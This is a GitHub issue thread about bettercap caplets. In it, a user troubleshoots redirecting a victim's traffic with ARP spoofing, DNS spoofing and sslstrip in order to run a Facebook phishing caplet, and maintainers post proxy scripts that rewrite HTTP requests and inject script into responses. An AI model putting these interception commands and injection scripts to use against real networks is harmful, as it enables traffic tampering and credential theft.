Closed bruvv closed 6 years ago
buffermet
commented
6 years ago You say
When i run it no computer (http nor https) is being redirected to my http server.
But then you also say
Then you get the error from google chrome (HSTS)
So are you sslstripping and then get a HSTS warning? That would mean that traffic is redirected to your proxy server.
Are you able to sniff HTTP traffic? If not, maybe your router is too secure, in which case you can try spawning your own AP.
bruvv
commented
6 years ago Thanks for the reply. I did run it with sslstrip at one point just to see if it is working. Than I get that error message. when I leave it off nothing gets redirected. Also tried playing around with the dns.spoof but that just gives dns errors in chrome and does not redirect either to the webserver.
if i enable net.sniff (on) than yes I can see data. So sniffing is working, it is just the redirect that is not working.And I am using a pineapple nano as a router.
buffermet
commented
6 years ago hmmmm.. Are you sure nothing gets redirected? It sounds to me like things are being redirected but the HSTS rules of facebook are preventing you from manipulating those requests/responses.
Try a site without SSL.
Edit: I have a caplet in the works to bypass hsts rules which I will upload soon
bruvv
commented
6 years ago Thanks for that yungtravla, i tested multiple sites. http and https. Would you mind testing it yourself? Could be me that it is not working
buffermet
commented
6 years ago @d1slact0r what did you try to do with the http traffic?
Please run the following test and if that does not yield positive results then you should include some debug logs by issuing bettercap -debug
Save the following file in your caplets folder:
issue235.js
function onResponse(req, res) {
res.ReadBody()
res.Body = "payload"
}Then fire up bettercap and test the proxy script by issuing
set http.proxy.script caplets/issue235.js
arp.spoof on
http.proxy onHTTP traffic should now be intercepted and manipulated.
buffermet
commented
6 years ago Actually no I don't think that made any difference...
bruvv
commented
6 years ago I am sorry for the late reply I did not had the time to test this yet. Will try and see if it works for me to test it tomorrow! Just for my own knowledge. The JS scripts that get injected. That only gets injected in the server ? Or is it being injected into a victims browser?
buffermet
commented
6 years ago @d1slact0r it is up to you where/what you inject.
I think you meant to ask if your payloads will be injected in request packets as well as response packets?
You can access all properties from both packets, like so:
Change HTTP request headers before proxying a response
function onRequest(req, res) {
req.SetHeader("User-Agent", "bettercap")
}Change HTTP request parameters before proxying a response
function onRequest(req, res) {
if ( req.Host == "youtube.com" || req.Host == "www.youtube.com" ) {
req.ReadBody()
req.Body = req.Body.replace(/v=[a-z0-9]+/i, "v=0jGaio87u3A")
}
}Serve a HTTP response before proxying a response
function onRequest(req, res) {
if ( req.Host == "192.168.1.4" ) {
res.Status = 403
res.Body = "forbidden"
}
}Change HTTP response body after proxying a response
function onResponse(req, res) {
if ( res.ContentType == "text/html" ) {
res.ReadBody()
res.Body = res.Body.replace(/<\/head>/i, "<script>alert('injected')</script></head>")
}
}
evilsocket
commented
6 years ago @yungtravla should this issue be kept open or can I close?
bruvv
commented
6 years ago I did not had the time to test it to confirm that it is working. So no do not close it. @yungtravla what I meant to ask is where does the JS files get injected to? Where is that javascript placed? On the server that bettercap greates right?
ghost
commented
6 years ago @yungtravla I saved this:
set http.proxy.script caplets/issue235.js arp.spoof on http.proxy on
Has a caplet and fired up bettercap with "sudo ./bettercap -caplet caplets/issue235.cap" and then in that issue235.js I've tried every JavaScript that you had asked to test and I couldn't get any result unfortunelly :s The youtube JavaScript you gave, I also tried but youtube should get downgraded to http I think because when I used that youtube JavaScript I still stayed in https and even in https, I tried to load a video and I didn't got redirected. Relatively to the other JavaScripts I've tried them in http websites but they still didn't worked out :s Maybe the problem is mine, if I'm making anything wrong please tell me.
PS: I tried it from my computer to my android phone which is android 8.1 with firefox on it.
evilsocket
commented
6 years ago This is basically a duplicate of #154.
Facebook domains are preloaded in HSTS, meaning you can't spoof them (via arp.spoof + dns.spoof, which I just tested for other domain on macOS and work correctly, if used correctly). That is why the fb-phish caplet does not include any type of spoofing in it, but it just offers a fake Facebook login and intercepts the credentials.
bruvv
commented
6 years ago You should really stop closing issues so quickly withouth giving users the time to reply or asking them it has been resolved... And this has nothing to do with the facebook domain. If you read you should see that this is an issue with redirect victim to bettercap nginx server (http server). This could be from any domain. Lets take www.randomwebsite.com should redirect the users to the bettercap http server at this point that is not working.
evilsocket
commented
6 years ago You should really stop closing issues so quickly withouth giving users the time to reply or asking them it has been resolved...
It looks to me you still had the chance to reply, moreover, managing this project, it's up to me to decide which issue to keep open, which to close and why ... remember this is a free software and github issues are not for customer support, but they're a tool for us, the developers.
The real problem is not the issue being closed, but that I gave an explaination you don't like, that the caplet you're using is not supposed to work as you want it to work because, as described on #154, that'd require a fully working sslstrip which is not in TODO given HSTS made it nearly pointless in most important cases years ago.
buffermet
commented
6 years ago @d1slact0r what does it matter whether this issue remains open or not? evilsocket is just trying to keep the issues page clean.
buffermet
commented
6 years ago @madScript01 I believe the example issue235.js I gave was missing res.ReadBody() before res.Body = "payload"
bruvv
commented
6 years ago I finally had some time off and succesfully tested issue235.js. The site gets spoofed. I now finally understand the JS file part. Now my javascript sucks, I just do not have the knowledge to write a script that intercepts the victim browsing the web and redirects them to the bettercap server? (this can be anything, I do not want people to relogin into facebook but I want them to be rickrolled or something)
buffermet
commented
6 years ago @d1slact0r Well if you want to learn javascript then I suggest you "google" things step by step and mess around in your browser's console, you can learn tonnes of stuff that way.
bruvv
commented
6 years ago I just saw the new update to the caplets, I think that is exactly what I was looking for and meant to ask in here :) will try this new injectjs caplet asap!
evilsocket
commented
6 years ago OMG people get supported even if the issue is close!!! crazy isn't it?!!?!? :'D glad this has been solved one way or another, @yungtravla amazing work, you're definitely the caplets pro :D
buffermet
commented
6 years ago <3
What I am trying at home is the fb-phishing caplet. When i run it no computer (http nor https) is being redirected to my http server. What I tried: Dns spoof The victim just loses connection and says there is no internet connection ARP spoof Nothing gets spoofed and the computer keeps it's connection HTTP(s) Proxy with SSLstrip Then you get the error from google chrome (HSTS)
Going from the victim ip to the webserver works and when i try to login it redirects to facebook.com/login.php but the inlog details are not saved nor displayed thus assuming that the javascript injection is not working.
Environment
Please provide:
Bettercap version = latest
Victum + host = MacOS
Command line arguments you are using = sudo ./bettercap -caplet caplets/fb-phish.cap
Steps to Reproduce
Expected behavior: Victim gets redirected to the fake FB site. fills in the username and password and that gets saved (does not save the login details!)
Actual behavior: The victim just goes straight through internetting without forwarding
LOG: Caplet:
Output:
ref: https://github.com/bettercap/caplets/issues/13